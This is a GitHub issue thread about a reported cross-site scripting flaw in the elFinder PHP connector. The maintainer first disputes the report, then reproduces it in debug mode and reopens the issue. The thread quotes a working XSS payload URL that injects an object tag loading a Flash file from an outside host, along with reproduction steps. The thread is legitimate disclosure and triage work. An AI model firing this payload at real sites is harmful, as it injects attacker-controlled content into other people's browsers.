Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Possible XSS issue #1975

Closed
dleffler opened this issue Apr 19, 2017 · 7 comments
Closed

Possible XSS issue #1975

dleffler opened this issue Apr 19, 2017 · 7 comments
Labels
connector bug

Comments

@dleffler
Copy link

I've been notified of an XSS security vulnerability within elFinder. The fix is to add htmlspecialchars($data) into line 309 of elFinderConnector.class.php to filter the json output.

    $out = json_encode(htmlspecialchars($data));

I have additional details including the payload and other research as sent to me by chengable
@nao-pon
Copy link
Member

nao-pon commented Apr 20, 2017

@dleffler Since sends data from the connector may contain HTML tags, we can not accept this proposal. Please sanitize your own data separately. Or use fm.escape() to escape on client side.

@nao-pon nao-pon closed this as completed Apr 20, 2017
@dleffler
Copy link
Author

Perhaps the fix given to me wasn't the real fix...here is the payload:

localhost/connector.php?cmd=open&target=l1_asdl<object%2
0allowscriptaccess=always>%20<param%20name=url%20value=http%3A%2F%2F
mhz.pw%2Fgame%2Fxss%2Falert.swf>

@nao-pon
Copy link
Member

nao-pon commented Apr 20, 2017

Give that payload to the elFinder connector, the next response will be returned.

{"error":["errOpen","#l1_asdl<object allowscriptaccess=always> <param name=url value=http:\/\/mhz.pw\/game\/xss\/alert.swf>","errFolderNotFound"]}

This is the error dialog displayed by that data.

fireshot capture 5 - test here_elfinder 2 1_ - https___hypweb net_elfinder-nightly_demo_develop_

It does not seem to be vulnerable to XSS.

@dleffler
Copy link
Author

This seems to only occur when 'debug' is turned ON (where the output is not escaped). With a test setup

http://localhost/elFinder/php/connector.php?cmd=open&target=l1_asdl<object%2
0allowscriptaccess=always>%20<param%20name=url%20value=http%3A%2F%2F
mhz.pw%2Fgame%2Fxss%2Falert.swf>

@nao-pon
Copy link
Member

nao-pon commented Apr 22, 2017

I am testing in debug mode, but I can not reproduce this problem.
Could you explain the detailed procedure to reproduce this problem?

@dleffler
Copy link
Author

  1. extract elFinder into your web folder into folder named 'elFinder'
  2. rename php/connector.php.dist to connector.php
  3. browse to the above url in your browser

The issue will not appear with connector.minimal.php.dist since debug is not passed to elFinderConnector. It appears the issue is if you force json output as text/html.

@nao-pon
Copy link
Member

nao-pon commented Apr 23, 2017

Yes, I understood. I was checking the display on the wlFinder client. text/plain should be returned in the content type when debugging.

@nao-pon nao-pon reopened this Apr 23, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
connector bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@dleffler @nao-pon